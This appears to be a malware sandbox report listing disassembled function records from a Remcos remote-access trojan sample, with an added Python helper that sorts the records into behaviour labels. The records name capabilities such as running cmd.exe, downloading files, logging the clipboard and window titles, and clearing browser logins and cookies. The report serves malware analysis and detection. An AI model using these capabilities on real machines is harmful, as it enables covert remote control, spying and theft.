• Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
• Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
• Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
• Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D

APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
• GetProcAddress.KERNEL32(00000000), ref: 0040141B
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
• Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
• Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
• Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
• Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

APIs
• LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
• GetProcAddress.KERNEL32(00000000), ref: 004014C0
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
• Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
• Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
• Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
• Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

APIs
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
• Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
• Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
• Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A

Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
• Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
• Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
• Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
• __freea.LIBCMT ref: 100087D5
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
Memory Dump Source
• Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
• Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
• Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
• Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0

APIs
Strings
• [Cleared browsers logins and cookies.], xrefs: 0040C0E4
• Cleared browsers logins and cookies., xrefs: 0040C0F5
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
• Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
• Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
• Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
• Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
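
The function records above are raw evidence: ShellExecuteW with "open" and "cmd.exe" plus the "/C " string (a remote shell), TerminateThread around UnhookWindowsHookEx (tearing down the keyboard hook), LoadLibraryA/GetProcAddress resolving GetLastInputInfo and GetModuleHandleA/GetProcAddress resolving GetCursorInfo at runtime (user-idle checks that only show up as strings), and the "Cleared browsers logins and cookies." log strings. Mapping such records to behaviours by hand is tedious, so here is an added Python triage helper that parses this record format and applies such a mapping. It is not part of the Joe Sandbox report and not Remcos code; the INDICATORS table, its label names and the record-splitting rule (a record ends at its "Instruction Fuzzy Hash" line) are assumptions made for this sample. The sample input is three records copied from the listing above, trimmed to the lines the parser uses.

```python
import re
from dataclasses import dataclass, field

# Behaviour table (an assumption chosen for this Remcos sample): label ->
# (APIs the function must call, substring that must appear among its strings
#  or call arguments, or None when the API set alone is enough).
INDICATORS = {
    "remote shell via cmd.exe": (("ShellExecuteW",), "cmd.exe"),
    "keyboard hook teardown": (("UnhookWindowsHookEx",), None),
    "idle check resolved at runtime": (("GetProcAddress",), "GetLastInputInfo"),
    "registry read": (("RegOpenKeyExW", "RegQueryValueExW"), None),
    "anti-forensic log string": ((), "Cleared browsers logins and cookies"),
}
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
# "• Name.MODULE(arg,...), ref: 00416130"; the "Part of subcall" prefix is optional
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(?P<name>[A-Za-z0-9_:@]+)\.[A-Za-z0-9]+"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (name, args, call site)
    strings: list = field(default_factory=list)  # (text, xref)
    fields: dict = field(default_factory=dict)   # API ID, String ID, hashes, ...

    def api_names(self):
        return {name for name, _, _ in self.apis}

    def evidence(self):
        # Strings entries, the "$"-joined String ID and all call arguments
        items = [text for text, _ in self.strings]
        items += self.fields.get("String ID", "").split("$")
        for _, args, _ in self.apis:
            items += args.split(",")
        return [i.strip() for i in items if i.strip()]

    def first_ref(self):
        refs = [ref for _, _, ref in self.apis] + [x for _, x in self.strings]
        return refs[0] if refs else None

def parse_records(text):
    # A record ends at its "Instruction Fuzzy Hash" line, the last field the
    # plugin prints, so a truncated trailing record is dropped rather than merged.
    records, current, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()  # also removes the page's indentation
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            if m := API_RE.match(line):
                current.apis.append((m["name"], m["args"] or "", m["ref"]))
            continue
        if section == "Strings":
            if m := STRING_RE.match(line):
                current.strings.append((m["text"], m["ref"]))
            continue
        if m := KV_RE.match(line):
            current.fields[m["key"]] = m["value"]
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(current)
                current, section = FunctionRecord(), None
    return records

def classify(record):
    evidence = record.evidence()
    return {label for label, (apis, needle) in INDICATORS.items()
            if set(apis) <= record.api_names()
            and (needle is None or any(needle in e for e in evidence))}

def triage(text):
    # [(first call-site address, sorted behaviour labels)] for flagged records
    out = []
    for rec in parse_records(text):
        if labels := classify(rec):
            out.append((rec.first_ref(), sorted(labels)))
    return out

# Three records copied from the report above, trimmed to the lines the parser uses.
SAMPLE_REPORT = """\
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
Strings
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
APIs
• LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
• GetProcAddress.KERNEL32(00000000), ref: 004014C0
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
APIs
Strings
• [Cleared browsers logins and cookies.], xrefs: 0040C0E4
• Cleared browsers logins and cookies., xrefs: 0040C0F5
Similarity
• API ID: Sleep
• Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
"""

if __name__ == "__main__":
    print(triage(SAMPLE_REPORT))
```

Two caveats when running this over a full report: the "API ID" field is the plugin's own word-joined summary and is deliberately not parsed, since the APIs section (including "Part of subcall" lines) carries the same information in usable form; and a record with no closing "Instruction Fuzzy Hash" line, such as the EnumDisplayMonitors/EnumDisplayDevicesW record cut off at the end of this page, is dropped rather than silently merged into its neighbour.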
                                                                        APIs
                                                                        • EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
                                                                        • EnumDisplayDevicesW.USER32(?), ref: 00419525
                                                                        • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
                                                                        • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: DisplayEnum$Devices$Monitors
                                                                        • String ID:
                                                                        • API String ID: 1432082543-0
                                                                        APIs
                                                                          • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                                          • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                                                          • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                        • Sleep.KERNEL32(00000BB8), ref: 0041277A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQuerySleepValue
                                                                        • String ID: 8SG$`2U$exepath
                                                                        • API String ID: 4119054056-1749556203
                                                                        APIs
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                        • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseHandleReadSize
                                                                        • String ID:
                                                                        • API String ID: 3642004256-0
                                                                        APIs
                                                                          • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                                                                          • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                                                                          • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
                                                                        • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                                        • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Window$SleepText$ForegroundLength
                                                                        • String ID: [ $ ]
                                                                        • API String ID: 3309952895-93608704
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: SystemTimes$Sleep__aulldiv
                                                                        • String ID:
                                                                        • API String ID: 188215759-0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        APIs
                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                                          • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                        • String ID:
                                                                        • API String ID: 2633735394-0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 4116985748-0
                                                                        APIs
                                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                                          • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                        • String ID:
                                                                        • API String ID: 1761009282-0
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__start
                                                                        • String ID: pow
                                                                        • API String ID: 3213639722-2276729525
                                                                        APIs
                                                                        • _free.LIBCMT ref: 1000655C
                                                                          • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                          • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                          • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                        • String ID: *?$.
                                                                        • API String ID: 2667617558-3972193922
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: __alloca_probe_16__freea
                                                                        • String ID: @5U
                                                                        • API String ID: 1635606685-921383711
                                                                        APIs
                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418ABE
                                                                          • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                                          • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                          • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                        • String ID: image/jpeg
                                                                        • API String ID: 1291196975-3785015651
APIs
  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
• __Init_thread_footer.LIBCMT ref: 0040B797
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]
• API String ID: 1881088180-3686566968
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BAA
  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
• SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BCF
  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/png
• API String ID: 1291196975-2966254431
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
• GetFileType.KERNEL32 ref: 00449C4E
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FileHandleType
• String ID: (T
• API String ID: 3000768030-1256210051
APIs
• GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
• GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040501F
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: (T
• API String ID: 269201875-1256210051
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID: _free
• String ID: @D[
• API String ID: 269201875-3883357871
APIs
• Sleep.KERNEL32 ref: 00416640
• URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DownloadFileSleep
• String ID: !D@
• API String ID: 1931167962-604454484
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
